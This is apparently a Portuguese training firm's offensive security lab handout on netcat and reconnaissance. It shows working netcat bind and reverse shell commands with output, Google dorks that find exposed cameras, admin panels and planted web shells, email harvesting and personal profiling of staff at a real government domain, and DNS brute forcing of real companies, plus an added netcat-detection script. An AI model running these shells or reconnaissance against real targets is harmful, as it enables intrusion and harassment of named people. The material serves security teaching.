
2 netcat enum-pub

Solution Consultoria e Treinamento

www.solution-rj.com.br

Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: [email protected]/Tel: 021 8732-9993

Offensive Security Course Lab

Netcat and Enumeration (Google Hacking, Whois and DNS)

1. NETCAT

a) Help

root@bt:~/lab_bash-script# nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
root@bt:~/lab_bash-script#


b) Banner grabbing - checking open ports and reading banners

root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21
(UNKNOWN) [172.16.49.100] 21 (ftp) open
220 (vsFTPd 2.3.0)
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80
(UNKNOWN) [172.16.49.100] 80 (www) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 20 Jun 2012 22:01:42 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT
ETag: "c5af2-b1-4c2ee7bee7e05"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

c) Simple chat

On Backtrack:

nc -lvp 4444


On Windows XP-SP2:

nc -nv 172.16.49.130 4444

Just type anything on either machine.

d) Remote Administration - BIND SHELL

On the BT box, located on the external network:

root@bt:~# nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...

On the Windows XP-SP2 machine on the internal network:

C:\>nc -nv 172.16.49.130 4444
(UNKNOWN) [172.16.49.130] 4444 (?) open
ls
Desktop
lab_bash-script
rota.sh


- REVERSE SHELL - NC

On the BT box, located on the external network:

root@bt:~# nc -lvp 4444
listening on [any] 4444 ...

On the Windows XP-SP2 machine on the internal network:

C:\>nc -nv 172.16.49.130 4444 -e cmd.exe
(UNKNOWN) [172.16.49.130] 4444 (?) open

Result on BT:

root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>hostname
hostname
CTP028

C:\>

e) Port Scan - external BT scanning the firewall (ports 21 to 30)

root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30
(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused
(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused
(UNKNOWN) [172.16.49.100] 22 (ssh) open
(UNKNOWN) [172.16.49.100] 21 (ftp) open
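The bind shell, the reverse shell and the port scan above all leave the same trace on the endpoint: a netcat process whose flags say what it is doing (-e/-c ties a program to the socket, -l opens a listener, -z is a zero-I/O scan). The following is an added example, not part of the course material: it parses constructed process-creation records in a simplified host|user|command-line format, modelled on the sessions in this lab, and grades each netcat invocation the way a defender would triage it. Real log sources (auditd EXECVE, Sysmon process creation) need their own field extraction before the command line reaches parse_nc_cmdline.

```python
"""Triage netcat command lines from process-creation records (added example)."""
from typing import Dict, List, Optional

NC_BINARIES = {"nc", "nc.exe", "ncat", "netcat"}
ARG_FLAGS = set("cegGiopqsTw")  # nc 1.10 options that take a value (see `nc -h`)

# Constructed sample records, host|user|command line, modelled on the lab sessions.
SAMPLE_LOG = """\
bt|root|nc -lvp 4444 -e /bin/bash
CTP028|user|C:\\tools\\nc.exe -nv 172.16.49.130 4444 -e cmd.exe
bt|root|nc -z -nvv -w 1 172.16.49.100 21-30
bt|root|nc -nv 172.16.49.100 80
bt|root|/bin/ls -la
"""


def parse_nc_cmdline(cmdline: str) -> Optional[Dict[str, object]]:
    """Security-relevant nc options, or None if the command is not netcat.
    Whitespace splitting is enough for flag triage; quoting only affects targets."""
    argv = cmdline.split()
    if not argv:
        return None
    binary = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if binary not in NC_BINARIES:
        return None
    info = {"exec": None, "listen": False, "port": None, "scan": False, "targets": []}
    i = 1
    while i < len(argv):
        arg, i = argv[i], i + 1
        if not (arg.startswith("-") and len(arg) > 1):
            info["targets"].append(arg)      # positional: host, port or port range
            continue
        for flag in arg[1:]:                 # grouped flags such as -lvp or -nvv
            value = None
            if flag in ARG_FLAGS and i < len(argv):
                value, i = argv[i], i + 1    # this flag consumes the next argument
            if flag in ("e", "c"):
                info["exec"] = value or "?"  # program tied to the socket
            elif flag == "l":
                info["listen"] = True
            elif flag == "z":
                info["scan"] = True
            elif flag == "p":
                info["port"] = value
    return info


def severity(info: Dict[str, object]) -> str:
    """Grade an invocation by what its flags imply."""
    if info["exec"]:
        return "critical"  # bind or reverse shell: a shell is tied to a socket
    if info["listen"]:
        return "high"      # listener: chat, file drop or reverse-shell catcher
    if info["scan"]:
        return "medium"    # zero-I/O connects: port scan
    return "low"           # single outbound connect, e.g. banner grabbing


def triage(log_text: str) -> List[Dict[str, object]]:
    """One finding per netcat invocation in the records, in log order."""
    findings = []
    for line in filter(str.strip, log_text.splitlines()):
        host, user, cmdline = line.split("|", 2)
        info = parse_nc_cmdline(cmdline)
        if info is not None:
            findings.append({"host": host, "user": user, "cmdline": cmdline,
                             "severity": severity(info), **info})
    return findings
```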


f) File Transfer

On the BT box, located on the external network:

root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224

On the Windows XP-SP2 machine on the internal network:

C:\>nc.exe -nv 172.16.49.130 4444 < arq1.txt
(UNKNOWN) [172.16.49.130] 4444 (?) open

Result:

root@bt:~# ls
Desktop  lab_bash-script  output.txt  rota.sh
root@bt:~# more output.txt
teste de transferencia
root@bt:~#


2. Google Search

Google search operators - check the site operator and the others

site:offensive-security.com - see how many web pages the domain has (indexed pages)


site:www.offensive-security.com filetype:pdf (PDF only)

site:aeoi.org.ir (21,800 pages)


intitle:"Remote Desktop Web Connection" inurl:tsweb


Google Hacking Database - GHDB

Site running Webmin:

inurl:10000 webmin


Site running a VNC server:

intitle:"VNC viewer for java" --- VNC servers

http://okbk.myvnc.com:5800/


Print server:

intitle:"Network Print Server" filetype:shtm

SpeedStream router web interface:

intitle:"SpeedStream Router Management Interface"


intitle:"Setup Home" "You will need * log in before * * change * settings" (belkin)

Security camera:

inurl:"viewerframe?mode=motion"


inurl:"ViewerFrame?Mode="

inurl:"view/index.shtml"

"please visit" intitle:"i-Catcher Console" Copyright "iCode"

intitle:"everfocus edsr applet"


Videoconferencing software:

intext:"Videoconference Management System" ext:htm

Open phpMyAdmin:

intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"


Norton AV for gateways

inurl:"8003/Display?what="

MSN contacts:

filetype:ctt "msn"


Kickstart

#kickstart filetype:cfg

#kickstart filetype:cfg site:gov.br

CAREFUL!!!!!!

Apache backdoor:

intitle:r57 shell filetype:php

Site with a planted backdoor - antichat in the title:

intitle:"Antichat Shell" "disable functions"


3. Google Search Social

aeoi.org.ir on its own in Google - look at the emails

use theharvester.py (Python script on BT)

root@bt:~# cd /pentest/enumeration/theharvester/
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google

[-] Searching in Google:
        Searching 0 results...
        Searching 100 results...
        Searching 200 results...

[+] Emails found:
------------------
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]


use [email protected]

is a researcher, has a Yahoo email

use [email protected]


see SPAG Zeolite

company address, contact phone and another Gmail address

- look for a photo

use [email protected] - looking for an apartment, see the phone number


4. Whois


Whois query

root@bt:~# whois checkpoint.com | more

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Server Name: CHECKPOINT.COM
   IP Address: 216.200.241.66
   Registrar: NETWORK SOLUTIONS, LLC.
   Whois Server: whois.networksolutions.com
   Referral URL: http://www.networksolutions.com/en_US/

   Domain Name: CHECKPOINT.COM
   Registrar: NETWORK SOLUTIONS, LLC.
   Whois Server: whois.networksolutions.com
   Referral URL: http://www.networksolutions.com/en_US/
   Name Server: NS2.CHECKPOINT.COM
   Name Server: NS6.CHECKPOINT.COM
   Name Server: NS8.CHECKPOINT.COM
   Name Server: NS9.CHECKPOINT.COM
   Status: clientTransferProhibited
   Updated Date: 30-may-2012
   Creation Date: 29-mar-1994
   Expiration Date: 30-mar-2018

   Administrative Contact, Technical Contact:
      Admin, DNS  [email protected]
      Check Point Software Technologies Ltd.
      3A Jabotinsky St.
      Ramat-Gan, 52520
      IL
      +972-3-7534555 fax: +972-3-5759256

   Record expires on 30-Mar-2018.
   Record created on 29-Mar-1994.
   Database last updated on 20-Jun-2012 22:30:44 EDT.

   Domain servers in listed order:

   NS2.CHECKPOINT.COM           206.184.151.195
   NS6.CHECKPOINT.COM           194.29.32.199
   NS8.CHECKPOINT.COM           216.228.148.29
   NS9.CHECKPOINT.COM           194.29.38.64


Reverse whois query

root@bt:~# whois 216.200.241.66
#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 216.200.241.66"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=netref2
#

CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1) 216.200.241.64 - 216.200.241.79
Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 - 216.200.255.255

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html


5. DNS

Manual queries

Querying the domain's mail and name servers

root@bt:~# nslookup www.checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53

Non-authoritative answer:
Name:   www.checkpoint.com
Address: 216.200.241.66

root@bt:~# nslookup
> set type=mx
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53

Non-authoritative answer:
checkpoint.com  mail exchanger = 12 sami.checkpoint.com.
checkpoint.com  mail exchanger = 15 usmail-as.zonelabs.com.

Authoritative answers can be found from:
> set type=ns
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53

Non-authoritative answer:
checkpoint.com  nameserver = ns2.checkpoint.com.
checkpoint.com  nameserver = ns6.checkpoint.com.
checkpoint.com  nameserver = ns8.checkpoint.com.
checkpoint.com  nameserver = ns9.checkpoint.com.
checkpoint.com  nameserver = ns1.checkpoint.com.

Authoritative answers can be found from:
>


- DNS Information Gathering

1- Forward lookup BF (brute force) - try to guess valid names

- use script1.sh on BT for the BF (no manipulation)

- use script2.sh on BT for the BF ("has address")

root@bt:~/lab_DNS# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~/lab_DNS#

root@bt:~/lab_DNS# more script_dns1.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com
done

root@bt:~/lab_DNS# more script_dns2.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address"
done
root@bt:~/lab_DNS# ./script_dns2.sh
forums.checkpoint.com has address 194.29.38.13
ftp.checkpoint.com has address 194.29.38.25
ftps.checkpoint.com has address 194.29.38.27
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
mx1.checkpoint.com has address 194.29.38.66
ns.checkpoint.com has address 194.29.32.199
ns1.checkpoint.com has address 208.185.174.140
ns2.checkpoint.com has address 208.185.174.141
register.checkpoint.com has address 194.29.38.35
search.us.checkpoint.com has address 209.87.209.207
smtp.checkpoint.com has address 194.29.34.68
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
root@bt:~/lab_DNS#
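The bash loops above (and the IPs-only variant on the next page) report every name that answers, which is only meaningful if the zone has no wildcard record; the wwwwwwww.checkpoint.com probe returning NXDOMAIN is what makes that assumption safe here. The following is an added example, not one of the course's scripts: the same forward brute force in Python with that check made explicit (random labels are resolved first, and any guess whose only addresses match the wildcard answer is discarded) and with the addresses de-duplicated. The resolver is an injectable function so the logic runs offline against a constructed zone (the reserved example.test domain with RFC 5737 addresses); system_resolver uses the OS resolver the way `host` does.

```python
"""Forward-lookup brute force with a wildcard check (added example)."""
import random
import socket
import string
from typing import Callable, Dict, Iterable, List, Optional, Set

Resolver = Callable[[str], Optional[List[str]]]  # None means NXDOMAIN / no A record


def system_resolver(fqdn: str) -> Optional[List[str]]:
    """Resolve with the OS resolver, as `host` does."""
    try:
        return sorted(set(socket.gethostbyname_ex(fqdn)[2]))
    except socket.gaierror:
        return None


def wildcard_addresses(domain: str, resolve: Resolver, probes: int = 2) -> Set[str]:
    """Addresses answered for random labels; a non-empty set means a wildcard record."""
    found: Set[str] = set()
    for _ in range(probes):
        label = "".join(random.choices(string.ascii_lowercase, k=12))
        found.update(resolve(f"{label}.{domain}") or [])
    return found


def forward_bruteforce(domain: str, wordlist: Iterable[str],
                       resolve: Resolver = system_resolver) -> Dict[str, List[str]]:
    """name.domain -> addresses for each wordlist entry that resolves (what
    script_dns2 greps for), minus addresses that merely match the wildcard."""
    wild = wildcard_addresses(domain, resolve)
    results: Dict[str, List[str]] = {}
    for name in wordlist:
        name = name.strip().lower()
        if not name or name.startswith("#"):   # skip blanks and wordlist comments
            continue
        fqdn = f"{name}.{domain}"
        addrs = [a for a in (resolve(fqdn) or []) if a not in wild]
        if addrs:
            results[fqdn] = addrs
    return results


def unique_addresses(results: Dict[str, List[str]]) -> List[str]:
    """The IPs-only view (what script_dns3 extracts with cut), de-duplicated."""
    return sorted({a for addrs in results.values() for a in addrs})


def table_resolver(table: Dict[str, List[str]],
                   wildcard: Optional[List[str]] = None) -> Resolver:
    """Constructed offline resolver: names in `table` answer as listed, anything
    else gets the wildcard answer, or NXDOMAIN when no wildcard is configured."""
    def resolve(fqdn: str) -> Optional[List[str]]:
        if fqdn in table:
            return list(table[fqdn])
        return list(wildcard) if wildcard else None
    return resolve


# Constructed zone for the reserved example.test domain (RFC 5737 addresses).
SAMPLE_ZONE = {
    "www.example.test": ["192.0.2.10"],
    "ftp.example.test": ["192.0.2.20"],
    "ns.example.test": ["192.0.2.30"],
    "mail.example.test": ["198.51.100.1"],  # same address as the wildcard used below
}
SAMPLE_WORDLIST = ["www", "ftp", "ftps", "mail", "ns", "# comment", "forums"]

if __name__ == "__main__":
    print(forward_bruteforce("example.test", SAMPLE_WORDLIST,
                             table_resolver(SAMPLE_ZONE, wildcard=["198.51.100.1"])))
```

With the wildcard configured, mail.example.test is not reported because its only address is indistinguishable from the wildcard answer; without it, the same name is a genuine finding.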


- use script3.sh on BT for the BF (IPs only)

root@bt:~/lab_DNS# more script_dns3.sh
#!/bin/bash
for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do
host $name.checkpoint.com | grep "has address" | cut -d" " -f4
done
root@bt:~/lab_DNS# ./script_dns3.sh
194.29.38.13
194.29.38.25
194.29.38.27
194.29.32.199
194.29.32.199
194.29.38.66
194.29.32.199
208.185.174.140
208.185.174.141
194.29.38.35
209.87.209.207
194.29.34.68
216.200.241.66
216.200.241.66

2- Reverse lookup BF

- Try reverse resolution

root@bt:~/lab_DNS# host 216.200.241.66
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com.
68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com.
69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com.
70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com.
71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com.
72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com.
73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com.
74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com.
75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com.
76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com.
77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com.
78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com.
79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.


3- Zone transfer

------try it against all the name servers (primary and secondaries)

------do it with aeoi.org.ir and estacio.br

root@bt:~# host -t ns offensive-security.com
offensive-security.com name server ns4.no-ip.com.
offensive-security.com name server ns2.no-ip.com.
offensive-security.com name server ns1.no-ip.com.
offensive-security.com name server ns3.no-ip.com.
offensive-security.com name server ns5.no-ip.com.
root@bt:~# host -l offensive-security.com ns1.no-ip.com
; Transfer failed.
Using domain server:
Name: ns1.no-ip.com
Address: 204.16.255.55#53
Aliases:

Host offensive-security.com.localdomain not found: 9(NOTAUTH)
; Transfer failed.


Use /pentest/enumeration/dnsenum

root@bt:/pentest/enumeration/dns/dnsenum# ls
dns-big.txt  dnsenum.pl  dns.txt  README.txt
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br
estacio.br                     5        IN    A        200.216.152.71

Name Servers:
ns1.estacio.br                 5        IN    A        200.216.152.249
ns2.estacio.br                 5        IN    A        200.216.152.250

Mail (MX) Servers:
Mail.Global.FrontBridge.com    5        IN    A        216.32.180.22
Mail.Global.FrontBridge.com    5        IN    A        216.32.181.178

estacio.br                     1800     IN    TXT
estacio.br                     1800     IN    A        200.216.152.71
1989163337.estacio.br          1800     IN    CNAME
mail._domainkey.estacio.br     14400    IN    TXT
agenda.estacio.br              1800     IN    A        200.216.152.71
agendaconselho.estacio.br      1800     IN    A        200.216.152.71
aluno.estacio.br               1800     IN    MX
biblioteca.estacio.br          1800     IN    CNAME
bibliotecasonora.estacio.br    1800     IN    A        200.216.152.90
blogdopresidente.estacio.br    1800     IN    A        200.216.152.149
bquestoes.estacio.br           1800     IN    A        200.216.152.63
adm.bquestoes.estacio.br       1800     IN    A        200.216.152.62
provas.bquestoes.estacio.br    1800     IN    A        200.216.152.63